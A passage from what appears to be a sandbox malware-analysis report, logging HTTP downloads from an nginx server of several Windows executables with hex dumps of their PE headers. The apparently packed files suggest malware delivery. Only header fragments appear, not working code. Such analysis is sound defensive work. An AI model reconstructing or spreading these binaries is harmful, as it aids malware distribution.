1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 9e f9 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 20 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 20 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 73 6b 75 7a 66 76 68 00 00 1a 00 00 30 31 00 00 f6 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 75 74 64 78 77 72 00 10 00 00 00 30 4b 00 00 04 00 00 00 8e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 92 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:46 GMTContent-Type: application/octet-streamContent-Length: 920582Last-Modified: Mon, 03 Feb 2025 14:01:26 GMTConnection: keep-aliveETag: "67a0cc36-e0c06"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 58 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 10 00 00 04 00 00 2b b1 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 32 57 01 00 00 00 00 00 00 00 00 00 9e e3 0d 00 68 28 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 32 57 01 00 00 40 0f 00 00 58 01 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 a0 10 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:45 GMTContent-Type: application/octet-streamContent-Length: 2859520Last-Modified: Sat, 08 Feb 2025 18:59:50 GMTConnection: keep-aliveETag: "67a7a9a6-2ba200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 9c f5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6d 71 6d 72 66 7a 72 00 60 2b 00 00 a0 00 00 00 42 2b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 74 6f 70 6e 6a 76 00 20 00 00 00 00 2c 00 00 06 00 00 00 7a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2c 00 00 22 00 00 00 80 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:51 GMTContent-Type: application/octet-streamContent-Length: 2137088Last-Modified: Sat, 08 Feb 2025 18:31:15 GMTConnection: keep-aliveETag: "67a7a2f3-209c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4a 00 00 04 00 00 1f 03 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 77 6d 75 76 75 76 76 00 20 1a 00 00 90 30 00 00 12 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6f 63 63 6d 73 64 6c 00 10 00 00 00 b0 4a 00 00 06 00 00 00 74 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 7a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:57 GMTContent-Type: application/octet-streamContent-Length: 1902592Last-Modified: Sat, 08 Feb 2025 18:17:52 GMTConnection: keep-aliveETag: "67a79fd0-1d0800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 cb 85 81 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 28 04 00 00 ba 00 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 f6 7f 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 50 05 00 6b 00 00 00 00 40 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 51 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 30 05 00 00 10 00 00 00 7a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 40 05 00 00 02 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 50 05 00 00 02 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 60 05 00 00 02 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 66 71 63 71 64 78 6d 00 60 1a 00 00 70 30 00 00 52 1a 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 69 6e 63 77 76 67 6e 00 10 00 00 00 d0 4a 00 00 04 00 00 00 e2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 e6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:23:02 GMTContent-Type: application/octet-streamContent-Length: 5347592Last-Modified: Sat, 08 Feb 2025 13:01:35 GMTConnection: keep-aliveETag: "67a755af-519908"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 5f 0e e5 45 3e 60 b6 45 3e 60 b6 45 3e 60 b6 f1 a2 91 b6 4f 3e 60 b6 f1 a2 93 b6 3f 3e 60 b6 f1 a2 92 b6 5d 3e 60 b6 c5 45 65 b7 60 3e 60 b6 c5 45 64 b7 54 3e 60 b6 c5 45 63 b7 51 3e 60 b6 4c 46 f3 b6 41 3e 60 b6 5b 6c f3 b6 46 3e 60 b6 45 3e 61 b6 25 3e 60 b6 cb 45 69 b7 44 3e 60 b6 cb 45 9f b6 44 3e 60 b6 cb 45 62 b7 44 3e 60 b6 52 69 63 68 45 3e 60 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ac e6 77 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 21 00 b2 00 00 00 ca 4e 00 00 00 00 00 ad 14 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 4f 00 00 04 00 00 9a cd 4f 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 29 01 00 50 00 00 00 00 60 01 00 64 4e 4e 00 00 00 00 00 00 00 00 00 00 80 4f 00 08 19 02 00 00 b0 4f 00 a8 0e 00 00 20 1f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 1e 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 af b1 00 00 00 10 00 00 00 b2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 60 00 00 00 d0 00 00 00 62 00 00 00 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 11 00 00 00 40 01 00 00 08 00 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 64 4e 4e 00 00 60 01 00 00 50 4e 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 0e 00 00 00 b0 4f 00 00 10 00 00 00 70 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:23:07 GMTContent-Type: application/octet-streamContent-Length: 2143232Last-Modified: Sat, 08 Feb 2025 19:01:51 GMTConnection: keep-aliveETag: "67a7aa1f-20b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 9e f9 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 20 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 20 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 73 6b 75 7a 66 76 68 00 00 1a 00 00 30 31 00 00 f6 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 75 74 64 78 77 72 00 10 00 00 00 30 4b 00 00 04 00 00 00 8e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 92 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:23:11 GMTContent-Type: application/octet-streamContent-Length: 785408Last-Modified: Sat, 08 Feb 2025 03:33:09 GMTConnection: keep-aliveETag: "67a6d075-bfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 7d fb da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 ce 01 00 00 08 00 00 00 00 00 00 0e ed 01 00 00 20 00 00 00 00 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 0c 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 ec 01 00 4b 00 00 00 00 00 02 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 0c 00 00 00 80 ec 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 